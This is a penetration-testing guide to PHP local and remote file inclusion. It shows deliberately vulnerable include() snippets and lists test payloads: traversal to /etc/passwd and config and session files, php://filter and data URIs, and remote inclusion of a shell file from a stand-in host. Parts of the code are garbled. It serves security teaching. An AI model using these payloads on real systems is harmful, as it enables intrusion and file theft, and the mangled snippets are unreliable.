Penetration testing guidance document contains attacks

1. Attack scenario

• File inclusion attack
• described

  File inclusion vulnerability is a type of "code injection". Because the programmer does not perform input checks on variables controlled by the user, the user can control the included file and inject a script or code that the user can control. When successfully utilized, the web server treats the file uploaded by the user as PHP and executes it, which allows the user to obtain certain server permissions. File inclusion vulnerability may lead to server-side code execution, client-side code execution, Issues such as leakage of sensitive information.

  File inclusion vulnerabilities include "local file inclusion" and "remote file inclusion". The local file inclusion vulnerability occurs when a page accepts a URL parameter as input without correct verification, which can lead to directory traversal string injection or access to other pages. The remote file inclusion vulnerability occurs when the page accepts a URL parameter as input, and this input is not correctly verified, resulting in external URLs being used as input parameters, resulting in external URLs and files on other servers being accessible through the server (such as hacker server attack code).

  Although most file inclusion problems occur in PHP scripts, we also need to note that other languages such as JSP and ASP can also have file inclusion vulnerabilities.

  To successfully exploit the file inclusion vulnerability, the following two conditions need to be met:

  1. Web applications use file inclusion functions such as include () to introduce the files that need to be included through dynamic variables

  2. Users can control more dynamic variables

• test method

  The original intention of the program is that when submitting the url to example.com/index.php? When func= add.php, add . Style content and functions in php. Direct access to http://example.com/index.php will include the default default . php 。Among them, index . The php code is:

  <? php

  if ($_ GET [‘ func ‘]){

  include .$_ GET [‘ func ‘];

  else {

  include 'default . php':

  }

  ?& gt;

  When introducing a file through PHP's include function, because the passed file name func has not been reasonably verified, unexpected files can be manipulated, which may lead to unexpected file leaks or even malicious code injection.

  If we submit example.com/index.php? func=upload/pic/evil.jpg, and evil . jpg is an image uploaded by a hacker to the server. Malicious php code is added to the end of the image, so the malicious code will be introduced into the current file and executed. If there is no valid php code in the included file, the file content will be output directly.

  Files that can be included

• Ordinary local files include

  <? php include (” inc /".$_ GET[‘ file ‘]);?& gt;

  When testing, you can try to include the following:

• Contains files in the same directory, for example: file =. htaccess

• Directory traversal, for example: file=../../../.././ var/lib/locate.db

• Package error log, for example:file =../../../../../../../ var/log/apache/ error.loge

• Get a web directory or other configuration file, such as: fille =../../../../../../../ usr/local/apache2/conf/httpd.conf

• Contains uploaded attachments, for example: file =../ attachment/ media/xxx.file

• Read the session file, for example: file=../../../../../../../ tmp/ sess _tnrdo9ub2tsdurntvOpdir1no7

• Read system files, for example: file =../../../.././ etc/passwd

• If you have phpinfo, you can include temporary files

• Restricted local files include

• <? php include (” inc /”_$_ GET[‘file’].&# 8221; htm “);?& gt;

  When testing, you can try to include the following:

• truncation, for example: ? file= ../../../../../../../ etc/passwd

• Truncate directory traversal, for example: file=../../../../../../../../../../../ var /www/

• Path length truncation, for example: file =../../../../../../../../.././ etc/ passwd /././././. […]/././././.

• The dot is truncated, for example: ? file =../../../../../../ boot.ini/……….. [….]&# 8230;….

• Ordinary remote files include

  <? php include ($_ GET [‘ file ‘]);?& gt;

  When testing, you can try to include the following:

• Remote code execution: ? file =[ httpIhttpsIftp ]://example . com/shell.txt

• Use php stream input :? file = php:// input

• Use php stream filter :? file=php://filter/convert .base64-encode/resource=index.php

• Use data URIs :? file=data://text/plain ;base64,SSBsb3ZIIFBIUAo=+

• Use XSS to execute arbitrary code: ? file =http://127.0.0.1/path/xss.php? xss=phpcode

• Restricted remote files include

• <? php include ( $ _ GET [‘ file’]. ".htm “):?& gt;

  When testing, you can try to include the following:

• ? file=http://example.com/shell

• ? file=http://example.com/shell.txt?

• ? file=http://example.com/shell.txt

• ? file=\evilshare\shell.php

2. Impact

File contains vulnerabilities that can read the source code of sensitive files or server-side scripts. Remote file contains vulnerabilities that can be directly used to execute arbitrary commands (because attackers can customize the content of included files), thus laying the foundation for attackers to carry out further attacks.